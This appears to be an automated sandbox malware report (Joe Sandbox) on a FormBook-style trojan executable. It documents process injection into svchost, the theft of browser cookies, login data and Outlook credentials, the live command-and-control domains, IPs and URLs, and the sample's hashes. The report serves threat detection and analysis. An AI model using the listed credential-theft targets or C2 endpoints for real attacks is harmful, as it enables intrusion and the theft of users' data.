Memory written: C:\Windows\SysWOW64\svchost.exe base: 5B1008

Source: C:\Users\user\Desktop\oLCnCWQDhK.exe

Code function: 0_2_00436CD7 LogonUserW,

0_2_00436CD7

Source: C:\Users\user\Desktop\oLCnCWQDhK.exe

0_2_0040D590

Source: C:\Users\user\Desktop\oLCnCWQDhK.exe

Code function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,

0_2_00434418

Source: C:\Users\user\Desktop\oLCnCWQDhK.exe

Code function: 0_2_0043333C __wcsicoll,mouse_event,__wcsicoll,mouse_event,

0_2_0043333C

Source: C:\Users\user\Desktop\oLCnCWQDhK.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\oLCnCWQDhK.exe"	Jump to behavior
Source: C:\Program Files (x86)\WTxtoIHnwgYQnMauPcJdJlcdhoLvMzBRBwfYcbyutNlTfhPKsepkKmlKAsefUSVxgYQEoQLZSaAhnGS\EthPSueuMbeZ.exe	Process created: C:\Windows\SysWOW64\wextract.exe "C:\Windows\SysWOW64\wextract.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\wextract.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\oLCnCWQDhK.exe

Code function: 0_2_00446124 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

0_2_00446124

Source: oLCnCWQDhK.exe, EthPSueuMbeZ.exe, 0000000C.00000000.1825794737.0000000001A41000.00000002.00000001.00040000.00000000.sdmp, EthPSueuMbeZ.exe, 0000000C.00000002.2505262703.0000000001A40000.00000002.00000001.00040000.00000000.sdmp, EthPSueuMbeZ.exe, 00000010.00000000.1979959044.0000000001861000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: EthPSueuMbeZ.exe, 0000000C.00000000.1825794737.0000000001A41000.00000002.00000001.00040000.00000000.sdmp, EthPSueuMbeZ.exe, 0000000C.00000002.2505262703.0000000001A40000.00000002.00000001.00040000.00000000.sdmp, EthPSueuMbeZ.exe, 00000010.00000000.1979959044.0000000001861000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: EthPSueuMbeZ.exe, 0000000C.00000000.1825794737.0000000001A41000.00000002.00000001.00040000.00000000.sdmp, EthPSueuMbeZ.exe, 0000000C.00000002.2505262703.0000000001A40000.00000002.00000001.00040000.00000000.sdmp, EthPSueuMbeZ.exe, 00000010.00000000.1979959044.0000000001861000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: ?Program Manager
Source: EthPSueuMbeZ.exe, 0000000C.00000000.1825794737.0000000001A41000.00000002.00000001.00040000.00000000.sdmp, EthPSueuMbeZ.exe, 0000000C.00000002.2505262703.0000000001A40000.00000002.00000001.00040000.00000000.sdmp, EthPSueuMbeZ.exe, 00000010.00000000.1979959044.0000000001861000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: oLCnCWQDhK.exe	Binary or memory string: JDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning

Source: C:\Users\user\Desktop\oLCnCWQDhK.exe

Code function: 0_2_004720DB GetLocalTime,__swprintf,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,

0_2_004720DB

Source: C:\Users\user\Desktop\oLCnCWQDhK.exe

Code function: 0_2_00472C3F GetUserNameW,

0_2_00472C3F

Source: C:\Users\user\Desktop\oLCnCWQDhK.exe

Code function: 0_2_0041E364 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,

0_2_0041E364

Source: C:\Users\user\Desktop\oLCnCWQDhK.exe

Code function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,

0_2_0040E500

Stealing of Sensitive Information

Tries to harvest and steal browser information (history, passwords, etc)

Source: Yara match	File source: 2.2.svchost.exe.690000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.690000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.2503030807.0000000002CC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1910782362.0000000002F70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2505420589.0000000004950000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2505519891.00000000049A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1910510903.0000000000690000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2505688280.00000000030D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1911128401.0000000003550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Source: C:\Windows\SysWOW64\wextract.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\wextract.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\wextract.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\wextract.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\wextract.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\wextract.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\wextract.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\wextract.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\wextract.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Source: oLCnCWQDhK.exe	Binary or memory string: WIN_XP
Source: oLCnCWQDhK.exe	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 8, 1USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]\|%%\|%[-+ 0#]?([0-9]\|\)?(\.[0-9]\|\.\)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----&
Source: oLCnCWQDhK.exe	Binary or memory string: WIN_XPe
Source: oLCnCWQDhK.exe	Binary or memory string: WIN_VISTA
Source: oLCnCWQDhK.exe	Binary or memory string: WIN_7
Source: oLCnCWQDhK.exe	Binary or memory string: WIN_8

Remote Access Functionality

Source: Yara match	File source: 2.2.svchost.exe.690000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.690000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.2503030807.0000000002CC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1910782362.0000000002F70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2505420589.0000000004950000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2505519891.00000000049A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1910510903.0000000000690000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2505688280.00000000030D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1911128401.0000000003550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\oLCnCWQDhK.exe	Code function: 0_2_004652BE socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,	0_2_004652BE
Source: C:\Users\user\Desktop\oLCnCWQDhK.exe	Code function: 0_2_00476619 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	0_2_00476619
Source: C:\Users\user\Desktop\oLCnCWQDhK.exe	Code function: 0_2_0046CEF3 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,	0_2_0046CEF3

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	2 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	2 Valid Accounts	1 Abuse Elevation Control Mechanism	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	2 Valid Accounts	3 Obfuscated Files or Information	NTDS	16 System Information Discovery	Distributed Component Object Model	21 Input Capture	3 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	21 Access Token Manipulation	1 DLL Side-Loading	LSA Secrets	141 Security Software Discovery	SSH	3 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	412 Process Injection	2 Valid Accounts	Cached Domain Credentials	2 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Virtualization/Sandbox Evasion	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	412 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
oLCnCWQDhK.exe	76%	ReversingLabs	Win32.Trojan.Autoitinject
oLCnCWQDhK.exe	100%	Avira	HEUR/AGEN.1321886
oLCnCWQDhK.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
www.n0pme6.top	198.44.251.203	true	true	unknown
servehimfoundation.org	84.32.84.32	true	true	unknown
www.timetime.store	unknown	unknown	true	unknown
www.servehimfoundation.org	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.n0pme6.top/2i77/?FBeh=LTODvrhkMVqC3PKCaJdvO2t6hDsejrMuF+eBTdKoQS/6ei5HfNTQm76vsHOzwLCg1kh0lrMBTIeoxNiIEVh8EQZRdYH26u2LqJt1YWeMJrh5ZIo+pKpB+Wc3K2X12eL+1JIO5dLCeoUs&DfhDq=hvZ8HhLP1L	true		unknown
http://www.n0pme6.top/2i77/	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.n0pme6.top	EthPSueuMbeZ.exe, 00000010.00000002.2504820863.0000000001285000.00000040.80000000.00040000.00000000.sdmp	false		unknown
https://ac.ecosia.org/autocomplete?q=	wextract.exe, 0000000D.00000003.2143247875.0000000007CCE000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/chrome_newtab	wextract.exe, 0000000D.00000003.2143247875.0000000007CCE000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	wextract.exe, 0000000D.00000003.2143247875.0000000007CCE000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	wextract.exe, 0000000D.00000003.2143247875.0000000007CCE000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/ac/?q=	wextract.exe, 0000000D.00000003.2143247875.0000000007CCE000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	wextract.exe, 0000000D.00000003.2143247875.0000000007CCE000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://www.ecosia.org/newtab/	wextract.exe, 0000000D.00000003.2143247875.0000000007CCE000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	wextract.exe, 0000000D.00000003.2143247875.0000000007CCE000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	wextract.exe, 0000000D.00000003.2143247875.0000000007CCE000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
84.32.84.32	servehimfoundation.org	Lithuania		33922	NTT-LT-ASLT	true
198.44.251.203	www.n0pme6.top	United States		26484	IKGUL-26484US	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1529043
Start date and time:	2024-10-08 15:43:18 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 4s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	17
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	oLCnCWQDhK.exe renamed because original name is a hash value
Original Sample Name:	09e15623dc49aa61d1d72e7a158d20c671093901c365fd2d5cbbf449d535a88a.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@7/2@3/2
EGA Information:	Successful, ratio: 75%
HCA Information:	Successful, ratio: 92% Number of executed functions: 51 Number of non-executed functions: 311
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing disassembly code.
VT rate limit hit for: oLCnCWQDhK.exe

Simulations

Behavior and APIs

Time	Type	Description
11:03:53	API Interceptor	25x Sleep call for process: wextract.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
84.32.84.32	N2Qncau2rN.exe	Get hash	malicious	FormBook	Browse	www.es-lidl.online/n2dv/
	RQ#071024.exe	Get hash	malicious	FormBook	Browse	www.thepeatear.online/lu5k/?O47=ODXYj9SHKZJf+lLWSD5bWs33an1UuUSGPEbmaLn0QSdqh031jXaTcKLg1x+9N8O9by/Xp7E95P2c73d08b4WEpTb1KZHJdxLaSQTbLs0J3NdMMrdrQ==&LT=aZbPzzPX3H
	8mmZ7Bkoj1.exe	Get hash	malicious	FormBook	Browse	www.thepeatear.online/pt4m/
	Products Order Catalogs20242.exe	Get hash	malicious	FormBook	Browse	www.pinkpantys.shop/cyro/
	YSjOEAta07.exe	Get hash	malicious	FormBook	Browse	www.pakmartcentral.shop/ml5l/
	Pending invoices.exe	Get hash	malicious	FormBook	Browse	www.b-ambu.com/a2tr/
	PURCHASE ORDER-6350.exe	Get hash	malicious	FormBook	Browse	www.agilizeimob.app/we8s/
	Narudzba ACH0036173.vbe	Get hash	malicious	FormBook, GuLoader	Browse	www.casesrep.site/7z6q/
	-pdf.bat.exe	Get hash	malicious	FormBook	Browse	www.dfmagazine.shop/7k8f/
	DHL_ 46773482.exe	Get hash	malicious	FormBook	Browse	www.agilizeimob.app/bnrj/
198.44.251.203	SOA SEPT 2024.exe	Get hash	malicious	FormBook	Browse	www.n0pme6.top/2i77/
198.44.251.203	September Order.exe	Get hash	malicious	FormBook	Browse	www.n0pme6.top/v236/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
www.n0pme6.top	SOA SEPT 2024.exe	Get hash	malicious	FormBook	Browse	198.44.251.203
	Order.exe	Get hash	malicious	FormBook	Browse	198.44.251.51
	Order 001-1.exe	Get hash	malicious	FormBook	Browse	198.44.251.51
	notificacion_de_credito__PDF__.exe	Get hash	malicious	FormBook	Browse	198.44.251.51
	September Order.exe	Get hash	malicious	FormBook	Browse	198.44.251.203

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
NTT-LT-ASLT	N2Qncau2rN.exe	Get hash	malicious	FormBook	Browse	84.32.84.32
	RQ#071024.exe	Get hash	malicious	FormBook	Browse	84.32.84.32
	8mmZ7Bkoj1.exe	Get hash	malicious	FormBook	Browse	84.32.84.32
	Products Order Catalogs20242.exe	Get hash	malicious	FormBook	Browse	84.32.84.32
	YSjOEAta07.exe	Get hash	malicious	FormBook	Browse	84.32.84.32
	Pending invoices.exe	Get hash	malicious	FormBook	Browse	84.32.84.32
	SOA SEPT 2024.exe	Get hash	malicious	FormBook	Browse	84.32.84.32
	PURCHASE ORDER-6350.exe	Get hash	malicious	FormBook	Browse	84.32.84.32
	1728239644b6c097b50f50c5ed70baa52a8cacbfdc1e82b38c0aa5c471e1a07dbef595bc59540.dat-decoded.exe	Get hash	malicious	Remcos	Browse	84.32.44.139
	MKWbWHd5Ni.rtf	Get hash	malicious	Remcos	Browse	84.32.44.139
IKGUL-26484US	na.elf	Get hash	malicious	Unknown	Browse	154.205.144.234
	na.elf	Get hash	malicious	Unknown	Browse	154.205.144.234
	na.elf	Get hash	malicious	Unknown	Browse	154.205.144.234
	na.elf	Get hash	malicious	Mirai	Browse	156.252.161.152
	SOA SEPT 2024.exe	Get hash	malicious	FormBook	Browse	198.44.251.203
	na.elf	Get hash	malicious	Mirai	Browse	154.219.20.183
	na.elf	Get hash	malicious	Mirai	Browse	156.249.231.145
	na.elf	Get hash	malicious	Mirai	Browse	156.249.132.19
	na.elf	Get hash	malicious	Mirai	Browse	156.249.231.136
	gmpsl.elf	Get hash	malicious	Mirai	Browse	156.238.135.134

Process:	C:\Windows\SysWOW64\wextract.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
Category:	modified
Size (bytes):	196608
Entropy (8bit):	1.1215420383712111
Encrypted:	false
SSDEEP:	384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
MD5:	9A809AD8B1FDDA60760BB6253358A1DB
SHA1:	D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
SHA-256:	95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
SHA-512:	2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\sulfhydric

Download File

Process:	C:\Users\user\Desktop\oLCnCWQDhK.exe
File Type:	data
Category:	modified
Size (bytes):	286208
Entropy (8bit):	7.994824214598057
Encrypted:	true
SSDEEP:	6144:yhBc/s4NWDuWnFufNk8mCbGwT+qSsbWwO9xxMOPCD90d4L0M4K5:cW/iuOINk8ZbtTKsiFx+6CCK5
MD5:	6F6BE093894E118B12E35B864D67882A
SHA1:	B4AFA269D2FA2B3A821EB418C13AAC485FDCD164
SHA-256:	E71C2606CC420DC29755D83E1CFB595E6708EFD05D9412135CE7287E465555B0
SHA-512:	9C98530349144429F3DB6EACA02324E3D7C77D6ED6F5988D8EF49DE8495E1CCDA8BA2B2AFDC1BC38E49567DDAD17903A310E93AF6F66024E5B4B82BE00CE895C
Malicious:	false
Reputation:	low
Preview:	.c.c.VWRJ..>....f.WQ..d4Y..ZVWRJMOL7Q9X1ZVWRJMOL7Q9X1ZVWR.MOL9N.V1._.s.L....Q1Bz&%=-?.!.2X6_5"w0/m=9YqP6....r'"+).\4R.ZVWRJMO56X.eQ=.j2-.r,P.#...l75.W...mY?.@...v-(.e8Z0.:1.RJMOL7Q9.tZV.SKM..~19X1ZVWRJ.ON6Z8S1Z.SRJMOL7Q9X.NVWRZMOLWU9X1.VWBJMON7Q?X1ZVWRJKOL7Q9X1Z6SRJOOL7Q9X3Z..RJ]OL'Q9X1JVWBJMOL7Q)X1ZVWRJMOL7Q9X1ZVWRJMOL7Q9X1ZVWRJMOL7Q9X1ZVWRJMOL7Q9X1ZVWRJMOL7Q9X1ZVWRJMOL7Q9X1ZVWRJMOL7Q9X1ZVWRJMOL7Q9X1ZVWRJMOL7Q9X1ZVWRJMOL7Q9X..3/&JMO.\|U9X!ZVW.NMO\7Q9X1ZVWRJMOL7q9XQZVWRJMOL7Q9X1ZVWRJMOL7Q9X1ZVWRJMOL7Q9X1ZVWRJMOL7Q9X1ZVWRJMOL7Q9X1ZVWRJMOL7Q9X1ZVWRJMOL7Q9X1ZVWRJMOL7Q9X1ZVWRJMOL7Q9X1ZVWRJMOL7Q9X1ZVWRJMOL7Q9X1ZVWRJMOL7Q9X1ZVWRJMOL7Q9X1ZVWRJMOL7Q9X1ZVWRJMOL7Q9X1ZVWRJMOL7Q9X1ZVWRJMOL7Q9X1ZVWRJMOL7Q9X1ZVWRJMOL7Q9X1ZVWRJMOL7Q9X1ZVWRJMOL7Q9X1ZVWRJMOL7Q9X1ZVWRJMOL7Q9X1ZVWRJMOL7Q9X1ZVWRJMOL7Q9X1ZVWRJMOL7Q9X1ZVWRJMOL7Q9X1ZVWRJMOL7Q9X1ZVWRJMOL7Q9X1ZVWRJMOL7Q9X1ZVWRJMOL7Q9X1ZVWRJMOL7Q9X1ZVWRJMOL7Q9X1ZVWRJMOL7Q9X1ZVWRJMOL7Q9X1ZVWRJMOL7Q9X1ZVWRJMOL7Q9X1ZVWRJMOL7Q9X1ZVWRJMOL7Q9X1ZVWRJMOL7Q9X1ZVWRJMOL

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.551486962086991
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	oLCnCWQDhK.exe
File size:	1'396'191 bytes
MD5:	6fb6b6ccf47f2867f674c818b974ea28
SHA1:	24e274ffb15837b50eb739e2bba906cef39aa99f
SHA256:	09e15623dc49aa61d1d72e7a158d20c671093901c365fd2d5cbbf449d535a88a
SHA512:	ab14ec2750c06d690f9d4386d6c0efc861083733a7b9a6bc8ecdbcc17ddcad9bf9b46ddb0eeab833516cde794036aad1badd5db269652b4a36848027090efb0f
SSDEEP:	24576:LRmJkcoQricOIQxiZY1WNyhSGtH+8APIY1QouVFdmLRFQ90SlM:IJZoQrbTFZY1WNyQGte8e3uVOLRm90F
TLSH:	0455F122F5C69035C2B327B19E7EF76A9A3D79360336D19733C82D315EA05416B2A723
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................1b.......P.).....Q.......y.......i..........}....N.......d.......`.......m.......g.....Rich............PE..L..

